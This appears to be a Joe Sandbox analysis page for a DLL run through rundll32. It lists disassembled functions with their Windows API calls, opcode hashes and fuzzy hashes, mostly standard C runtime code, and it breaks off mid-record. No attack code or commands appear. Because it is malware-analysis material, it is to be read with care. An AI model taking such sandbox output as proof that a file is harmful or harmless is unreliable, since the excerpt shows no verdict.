Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 37ccf47f8f46019a900a67c6a26adcc3fc9bc5f66c6e227a55c19e99acda5567
Instruction ID: 2e993d1e09b70a3a28fda42857f7747431715c2433cd94c8a029ce9b8ee6be2b
Opcode Fuzzy Hash: 37ccf47f8f46019a900a67c6a26adcc3fc9bc5f66c6e227a55c19e99acda5567
Instruction Fuzzy Hash: 0A21D576948BC59EDF055BB8F4017DC37A3DF1336DF100476D4806B1C2CB62604586E5

Function 6FB9B8B2 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6FB9B46E,00000001,00000364,00000006,000000FF,?,00000001,6FB9B68B,6FB9B935,?,?,6FB9AB0E), ref: 6FB9B8F3

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3e036fe6347172b0c152c89121b4194636e7a55e9085b331c7b595b637cdca59
Instruction ID: ee12fe49befe4fc6a2e4eea5b00693b56344b42aebc3ee6f52e3ac9f95f7dd66
Opcode Fuzzy Hash: 3e036fe6347172b0c152c89121b4194636e7a55e9085b331c7b595b637cdca59
Instruction Fuzzy Hash: A9F0B431205BA9A7EB115E67AD84A9F3B58EF8B670B11C133E8149B1C4CB30E60146E0

Non-executed Functions

Function 6FB97288 Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6FB97294
IsDebuggerPresent.KERNEL32 ref: 6FB97360
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FB97380
UnhandledExceptionFilter.KERNEL32(?), ref: 6FB9738A

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 62d08d2e9dcbc35a3432d4b318042301561eec7ab0c83d09bbab7f81ab283486
Instruction ID: 055b9218d39801f65b2b4d86d4de6cc16e609c4b3c70d669197b55c4ed121fa9
Opcode Fuzzy Hash: 62d08d2e9dcbc35a3432d4b318042301561eec7ab0c83d09bbab7f81ab283486
Instruction Fuzzy Hash: F93129B5D053189BDF20DFA4D9897CDBBF8EF09304F1041AAE40DAB290EBB45A858F44

Function 6FB99820 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6FB99918
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6FB99922
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6FB9992F

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2e2da0d69730781877387f2586dfcbab085a5a600a2921f4c78dbd6f5e1f8d5a
Instruction ID: 585114415b05215c5a53aa37d461a2e539484e2b2dd6222ec2149821923b0980
Opcode Fuzzy Hash: 2e2da0d69730781877387f2586dfcbab085a5a600a2921f4c78dbd6f5e1f8d5a
Instruction Fuzzy Hash: EC31A4B49012289BCF61DF69D9897CDBBB8FF09310F5041EAE41CA7290E7749B958F44

Function 6FB9A254 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6FB9A253,?,00000001,?,?), ref: 6FB9A276
TerminateProcess.KERNEL32(00000000,?,6FB9A253,?,00000001,?,?), ref: 6FB9A27D
ExitProcess.KERNEL32 ref: 6FB9A28F

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 076f7f8bbb03c5124df705a1e92f6905661218f9d47229f4d5532c08b8aee992
Instruction ID: ca61f1c908f7bc17a77d4e8c3c43ba4f092f6908a549a77c31554116d2111713
Opcode Fuzzy Hash: 076f7f8bbb03c5124df705a1e92f6905661218f9d47229f4d5532c08b8aee992
Instruction Fuzzy Hash: 7CE08631800544AFCF213F59D84DA4D3B2EFF07251B114420F40587120CB36E9E2EF90

Function 6FBA1AB1 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6FBA1AAC,?,?,00000008,?,?,6FBA1744,00000000), ref: 6FBA1CDE

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 88decd1f71f19bcd55c494e9e84a3951ec8489783ffbe8d580ad01f2be08ef57
Instruction ID: 4663db648f18a97ca3c70fb511a3cdf3c877b838454682fc151c3e361f29facb
Opcode Fuzzy Hash: 88decd1f71f19bcd55c494e9e84a3951ec8489783ffbe8d580ad01f2be08ef57
Instruction Fuzzy Hash: 56B16735214648CFD744CF28D486BA47BA1FF05364F298699E8E9CF2A1C336E982CF40

Function 6FB970A7 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6FB970BD

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 7de21c7c88ff20f1b269c705d649de539e2e3eb09e2054f0aa832da2f2df34bc
Instruction ID: 7a8d5bfbf022352345bc6ab137d53a97dfb75a9913fed4df6187c05fe3e90b81
Opcode Fuzzy Hash: 7de21c7c88ff20f1b269c705d649de539e2e3eb09e2054f0aa832da2f2df34bc
Instruction Fuzzy Hash: B2516AB1A10615DBDB14CF66D9827AEBBF0FB4A320F20C47AD915EB250D3B4A951CF60

Function 6FB9BCEE Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84a68a572d868f917fc0de4783eabe53ef09743487d6581fb314b482579c872e
Instruction ID: 69955b119290330548d2bf2213e6c2a7b6f9da198f5572eb27810f13cb9b036d
Opcode Fuzzy Hash: 84a68a572d868f917fc0de4783eabe53ef09743487d6581fb314b482579c872e
Instruction Fuzzy Hash: E041C3B180465DAFDB14CF69DC88AEEBBB8EF46304F1482E9E41DD3240DA349E848F50

Function 6FB9D218 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6FB9D218

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: f9afee9174519d42e03d2e2be001f6d571812d78b9930840f635ae3876fb29a4
Instruction ID: 35139a4323ca3a59543d05803dca2fc27e90e8ee7085fd3fe3e76bb2c64fa58d
Opcode Fuzzy Hash: f9afee9174519d42e03d2e2be001f6d571812d78b9930840f635ae3876fb29a4
Instruction Fuzzy Hash: 22A02474500500CF4F004F37411730C3DF5F54F1F13014014D001C3000D73040315700

Function 6FB9B881 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08556a0b7e2f291a7373366f56b938cabd7d16554c8359c94350950b64b82922
Instruction ID: 626b8ec6102574a53edf852f86ce2576cddc32c655ab520213a7f1499f4daae3
Opcode Fuzzy Hash: 08556a0b7e2f291a7373366f56b938cabd7d16554c8359c94350950b64b82922
Instruction Fuzzy Hash: CDE08C72A11268EBCB10CBD8D980A8EB3ECEB4AB10B5281A6F511D3200C270DF00C7D0

Function 6FB9DDF0 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 6FB9DE34

Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E24D
Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E25F
Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E271
Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E283
Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E295
Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E2A7
Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E2B9
Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E2CB
Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E2DD
Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E2EF
Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E301
Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E313
Part of subcall function 6FB9E230: _free.LIBCMT ref: 6FB9E325

_free.LIBCMT ref: 6FB9DE29

Part of subcall function 6FB9B90F: HeapFree.KERNEL32(00000000,00000000,?,6FB9AB0E), ref: 6FB9B925
Part of subcall function 6FB9B90F: GetLastError.KERNEL32(?,?,6FB9AB0E), ref: 6FB9B937

_free.LIBCMT ref: 6FB9DE4B
_free.LIBCMT ref: 6FB9DE60
_free.LIBCMT ref: 6FB9DE6B
_free.LIBCMT ref: 6FB9DE8D
_free.LIBCMT ref: 6FB9DEA0
_free.LIBCMT ref: 6FB9DEAE
_free.LIBCMT ref: 6FB9DEB9
_free.LIBCMT ref: 6FB9DEF1
_free.LIBCMT ref: 6FB9DEF8
_free.LIBCMT ref: 6FB9DF15
_free.LIBCMT ref: 6FB9DF2D

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 1fd3f6375e0a231ad22240b5f05d8eead204c172ab42c815e615a3663d48515a
Instruction ID: 053185cfb4040b4fdd1d71595b644a869a43e971d688a5f274f558e645a2de79
Opcode Fuzzy Hash: 1fd3f6375e0a231ad22240b5f05d8eead204c172ab42c815e615a3663d48515a
Instruction Fuzzy Hash: F4310A716047859FEF219A3AFC41B9A77EAEF07354F10983AE495DB190DB31BA508B20

Function 6FB982C0 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6FB983BD
type_info::operator==.LIBVCRUNTIME ref: 6FB983DF
___TypeMatch.LIBVCRUNTIME ref: 6FB984EE
IsInExceptionSpec.LIBVCRUNTIME ref: 6FB985C0
_UnwindNestedFrames.LIBCMT ref: 6FB98644
CallUnexpected.LIBVCRUNTIME ref: 6FB9865F

Strings

csm, xrefs: 6FB9836A
csm, xrefs: 6FB98416
csm, xrefs: 6FB982FD

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: b171a9ac03f8bc05a6221cf5282484945f069d8f74fac92c3c5d52c751791341
Instruction ID: 90f48bdb406103c373edc411feb457b3b017b5c161371ff5ad012d1ea6175002
Opcode Fuzzy Hash: b171a9ac03f8bc05a6221cf5282484945f069d8f74fac92c3c5d52c751791341
Instruction Fuzzy Hash: 46B15571808289EFCF05CFA4E980A9EBBB5FF06314F90417AE8156B251D771EA52CF91

Function 6FB9B188 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6FB9B19E

Part of subcall function 6FB9B90F: HeapFree.KERNEL32(00000000,00000000,?,6FB9AB0E), ref: 6FB9B925
Part of subcall function 6FB9B90F: GetLastError.KERNEL32(?,?,6FB9AB0E), ref: 6FB9B937

_free.LIBCMT ref: 6FB9B1AA
_free.LIBCMT ref: 6FB9B1B5
_free.LIBCMT ref: 6FB9B1C0
_free.LIBCMT ref: 6FB9B1CB
_free.LIBCMT ref: 6FB9B1D6
_free.LIBCMT ref: 6FB9B1E1
_free.LIBCMT ref: 6FB9B1EC
_free.LIBCMT ref: 6FB9B1F7
_free.LIBCMT ref: 6FB9B205

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ade39983fbf84e29ac307410622921318894098cd987af90847f620a01c86e72
Instruction ID: 30899ad4afd0731b02cd22f061a9399b0370a7de342e425f06058ea91ef41a74
Opcode Fuzzy Hash: ade39983fbf84e29ac307410622921318894098cd987af90847f620a01c86e72
Instruction Fuzzy Hash: 5721967691424CAFCF41EFA4D880EDE7BB9AF0A244F0181A6E5559B161DB31EB448B80

Function 6FB97C10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6FB97C47
___except_validate_context_record.LIBVCRUNTIME ref: 6FB97C4F
_ValidateLocalCookies.LIBCMT ref: 6FB97CD8
__IsNonwritableInCurrentImage.LIBCMT ref: 6FB97D03
_ValidateLocalCookies.LIBCMT ref: 6FB97D58

Strings

csm, xrefs: 6FB97CED

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: d31f4b69df1e6405d414b05f11917be8c8793af39cfdc41c1574bc883ff1d894
Instruction ID: f1a9f46cc6be517acfe641e15a1194ab49787401fd5d7e65c699bd2dcd6a4141
Opcode Fuzzy Hash: d31f4b69df1e6405d414b05f11917be8c8793af39cfdc41c1574bc883ff1d894
Instruction Fuzzy Hash: D641C574A04288ABCF10CF69E840ADE7BF5FF47328F208165E8149B791D771EA56CB90

Function 6FB9CE36 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 6FB9CEA1
api-ms-, xrefs: 6FB9CE8D

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: dc008af40193c635cc819ac66fab6f005b14bb4b8c41d168d6347525c78c7346
Instruction ID: 8a77e9760dcb0f3bbfc0a7a45fa4c3d1052c901b99ae20b2bede8ee1fa7000f0
Opcode Fuzzy Hash: dc008af40193c635cc819ac66fab6f005b14bb4b8c41d168d6347525c78c7346
Instruction Fuzzy Hash: 2721C6F2A45A92ABDB218A69AC45B9E3769EF037A0F110131E816F7281D730FD10C6E0

Function 6FB9E3CF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6FB9E397: _free.LIBCMT ref: 6FB9E3BC

_free.LIBCMT ref: 6FB9E41D

Part of subcall function 6FB9B90F: HeapFree.KERNEL32(00000000,00000000,?,6FB9AB0E), ref: 6FB9B925
Part of subcall function 6FB9B90F: GetLastError.KERNEL32(?,?,6FB9AB0E), ref: 6FB9B937

_free.LIBCMT ref: 6FB9E428
_free.LIBCMT ref: 6FB9E433
_free.LIBCMT ref: 6FB9E487
_free.LIBCMT ref: 6FB9E492
_free.LIBCMT ref: 6FB9E49D
_free.LIBCMT ref: 6FB9E4A8

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
Instruction ID: bb50f3840802f44d973791ba45cf6558229208b41a32ec65850c0b8e358f5aac
Opcode Fuzzy Hash: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
Instruction Fuzzy Hash: 04112E71548B88EADA21ABB0EC05FCF7F9CBF07704F40483DA299A61D1DB75F6148660

Function 6FB9F25C Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6FB9F2A4
__fassign.LIBCMT ref: 6FB9F489
__fassign.LIBCMT ref: 6FB9F4A6
WriteFile.KERNEL32(?,6FB9D927,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6FB9F4EE
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6FB9F52E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6FB9F5D6

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 6978bc5417ca00def5b9f13f2b41822c9c43281b4031bfa014c59a630797874b
Instruction ID: 7eb32e3921edabfe4b38c2ec8c81a53cd9b2605ec5a8c5582e4168dd66aa598f
Opcode Fuzzy Hash: 6978bc5417ca00def5b9f13f2b41822c9c43281b4031bfa014c59a630797874b
Instruction Fuzzy Hash: FFC19D75D002989FCF15CFA8D8909EDBBB5EF4A324F28416AE855BB241D731A942CF60

Function 6FB97F89 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6FB97B9E,6FB968B4,6FB96D4B,?,6FB96F85,?,00000001,?,?,00000001,?,6FBAC7B8,0000000C,6FB9707E), ref: 6FB97F97
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6FB97FA5
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6FB97FBE
SetLastError.KERNEL32(00000000,6FB96F85,?,00000001,?,?,00000001,?,6FBAC7B8,0000000C,6FB9707E,?,00000001,?), ref: 6FB98010

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 14cdbb04b7b23fa70db6168beb832c88e6ae803f6c46e7a365ede00ab7ff077b
Instruction ID: 580ae83e93f66e322c1f1f93faba2b09a2bc5cf2a49ed036052193e8d4b45fd7
Opcode Fuzzy Hash: 14cdbb04b7b23fa70db6168beb832c88e6ae803f6c46e7a365ede00ab7ff077b
Instruction Fuzzy Hash: F901FC3214CBA17D9A3016777C9A65E3794EF43779730073AF1309A0D4EF519862A140

Function 6FB9C17B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6FB9C180

Memory Dump Source

Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true

Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
